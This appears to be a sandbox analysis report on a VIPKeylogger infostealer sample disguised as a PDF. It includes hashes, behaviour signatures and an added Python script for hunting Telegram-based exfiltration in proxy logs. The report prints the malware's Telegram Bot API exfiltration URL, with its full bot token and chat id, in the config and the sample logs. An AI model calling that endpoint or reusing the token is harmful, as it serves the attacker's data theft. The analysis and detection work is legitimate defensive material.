General
Target: bb1734dc35fce4b73d1edb980b97459a3b97ca18.rar.tar.gz
Size: 71KB
Sample: 241001-c4yabawgmr
MD5: 77f338ee49015065dbcbefee689ef456
SHA1: 30862fc91fe894dd9dfcc44674cd720fb469fc22
SHA256: eddc1f1f36222555d38e95d9d3edf56bbe417fce33ec4c84135a586f7a7304d1
SHA512: 126ace2e05581be3a4fb47c5f4a8934f81fb98af506485e11ce101046eeda08dfec1886e7b74c923631cfecd7947cd022260a3a6bedaa19fb13ccfbe85989321
SSDEEP: 1536:qa/ASLzRvHzMsEIqEIqT4m9OXjfsPRKtDDe/hN+xrzLfQ8LHi:D/DHov89SjfAR6DSpN+lo8+
Static task: static1
Behavioral tasks (all run on the sample RFQ-00032035.PDF.scr):
behavioral1: win10-20240404-en
behavioral2: win7-20240903-en
behavioral3: win10-20240404-en
behavioral4: win10v2004-20240802-en
behavioral5: win11-20240802-en
Malware Config
Extracted family: vipkeylogger
Extracted URL (Telegram Bot API sendMessage endpoint used for exfiltration): https://api.telegram.org/bot7371892501:AAE6c_q-yLsVj82ZZEmMuRlQtTm95MBjCz0/sendMessage?chat_id=6750192797
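The extracted config above is the whole story of this sample's exfiltration: a Telegram bot token (numeric bot id plus secret) and a chat_id, with data pushed out through the public Bot API. The script below is an added example, not part of the sandbox report or of VIPKeylogger itself. It parses that URL into pivotable indicators (bot id and chat id, with the secret truncated so the token is not replayed from a ticket), hunts for the same pattern in proxy logs, and flags the double-extension lure used by the sample name RFQ-00032035.PDF.scr. The proxy log format and every log line other than the reported URL are constructed for the example; the IP-lookup host is a placeholder, since the report does not name the service.

```python
"""Added example (not part of the sandbox report or of VIPKeylogger itself):
parse the extracted Telegram Bot API exfiltration URL into pivotable
indicators, hunt for the same pattern in proxy logs, and flag the
double-extension lure used by the sample name.  The log format and all
log lines except the reported URL are constructed for this example."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Telegram Bot API shape: https://api.telegram.org/bot<bot_id>:<secret>/<method>
# bot_id and the chat_id query parameter identify the operator's bot and
# destination chat; the secret is the token itself.
TELEGRAM_BOT_RE = re.compile(
    r"https?://api\.telegram\.org/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]+)"
    r"/(?P<method>[A-Za-z]+)"
)

# Methods a stealer uses to push data out; getUpdates and friends are not exfil.
EXFIL_METHODS = {"sendMessage", "sendDocument", "sendPhoto"}


@dataclass(frozen=True)
class TelegramC2:
    bot_id: str
    secret: str
    method: str
    chat_id: Optional[str]


def parse_telegram_c2(url: str) -> Optional[TelegramC2]:
    """Return bot id, token secret, API method and chat_id, or None if the
    URL is not a Bot API call (e.g. ordinary web.telegram.org traffic)."""
    m = TELEGRAM_BOT_RE.search(url)
    if not m:
        return None
    chat_id = parse_qs(urlsplit(url).query).get("chat_id", [None])[0]
    return TelegramC2(m["bot_id"], m["secret"], m["method"], chat_id)


def redact(c2: TelegramC2) -> str:
    """Indicator string safe to put in a ticket: keeps bot_id and chat_id
    for pivoting but truncates the secret so the token cannot be replayed."""
    return (f"telegram bot {c2.bot_id} (secret {c2.secret[:4]}...) "
            f"-> chat_id {c2.chat_id} via {c2.method}")


# Hypothetical proxy log format for this example:
#   <iso-timestamp> <host> <process> <HTTP method> <url>
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) (?P<proc>\S+) (?P<http>GET|POST) (?P<url>\S+)$"
)

# Constructed sample lines.  Only the first URL comes from the report's
# extracted config; the IP-lookup host, the Chrome line and the updater
# line are made up to show what must NOT fire.
SAMPLE_LOGS = [
    "2024-10-01T02:04:11Z ws-17 RFQ-00032035.PDF.scr GET "
    "https://api.telegram.org/bot7371892501:AAE6c_q-yLsVj82ZZEmMuRlQtTm95MBjCz0"
    "/sendMessage?chat_id=6750192797",
    "2024-10-01T02:04:12Z ws-17 RFQ-00032035.PDF.scr GET https://example-ip-lookup.invalid/",
    "2024-10-01T02:05:00Z ws-03 chrome.exe GET https://web.telegram.org/k/",
    "2024-10-01T02:05:30Z ws-03 updater.exe POST https://api.telegram.org/bot1:abc/getUpdates",
]


def hunt_telegram_exfil(log_lines: List[str]) -> List[Tuple[str, str, TelegramC2]]:
    """Return (host, process, TelegramC2) for every line that sends data to a
    Telegram bot endpoint.  Client traffic and non-exfil methods are ignored."""
    hits = []
    for line in log_lines:
        lm = LOG_RE.match(line)
        if not lm:
            continue
        c2 = parse_telegram_c2(lm["url"])
        if c2 is not None and c2.method in EXFIL_METHODS:
            hits.append((lm["host"], lm["proc"], c2))
    return hits


# Double-extension lure: a document-looking name whose real (last) extension
# is executable.  .scr is a screensaver, i.e. a PE file that Windows runs.
EXEC_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "vbs"}
DECOY_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "txt", "jpg", "png"}


def is_double_extension_lure(filename: str) -> bool:
    parts = filename.lower().rsplit(".", 2)
    if len(parts) < 3:
        return False
    _, decoy, real = parts
    return real in EXEC_EXTS and decoy in DECOY_EXTS


if __name__ == "__main__":
    for host, proc, c2 in hunt_telegram_exfil(SAMPLE_LOGS):
        lure = " [double-extension lure]" if is_double_extension_lure(proc) else ""
        print(f"{host} {proc}{lure}: {redact(c2)}")
```

Matching on the api.telegram.org host alone would also catch legitimate bots and the web client, so the hunt keys on the `bot<id>:<secret>/<method>` path and restricts to sending methods; the bot id and chat id are the stable pivots across samples that reuse the same operator account, while the secret should be handled as a credential, not an IOC to paste around.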
Targets
Target: RFQ-00032035.PDF.scr (a .scr screensaver is a Windows PE executable; the ".PDF" in the name is a decoy double extension)
Size: 186KB
MD5: 4c7c55280d405f6241f4c9f236fdea24
SHA1: dfd1a0dce53f0a445ec6ad9f6d1266e96dec8f66
SHA256: 013d183433171067d14d79fb2288fa94689963e60482da638800f23834710e19
SHA512: 6cabc92097834307fb02f5687a19db6a93fe88f0c53cada037fe2f0eafb247ea7be249b460f53808a875c8febcf3460df235f8f4268370da92a11fb528dd0a10
SSDEEP: 3072:qh1KoemdZEhelYiU8aTTwmDOop3Q+Rt5IxMSke+mNOGW3emb4XBHTtOhu2qkWf3M:Doemd3lYiU5MmDOop3Q+RsxMSke+mNOW
Score: 10/10
Signatures
Suspicious use of NtCreateUserProcessOtherParentProcess
A process was created with a parent other than the caller (parent-PID spoofing), which hides the true process ancestry from tooling that relies on it.
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C#; it resembles SnakeKeylogger, which was first seen in 2020.
Accesses Microsoft Outlook profiles
Creates a large amount of network flows
This may indicate a network scan to discover remotely running services.
Looks up external IP address via web service
Uses a legitimate IP lookup service to find the infected system's external IP.
Suspicious use of SetThreadContext
Rewriting another thread's context is a common step in process injection (for example process hollowing).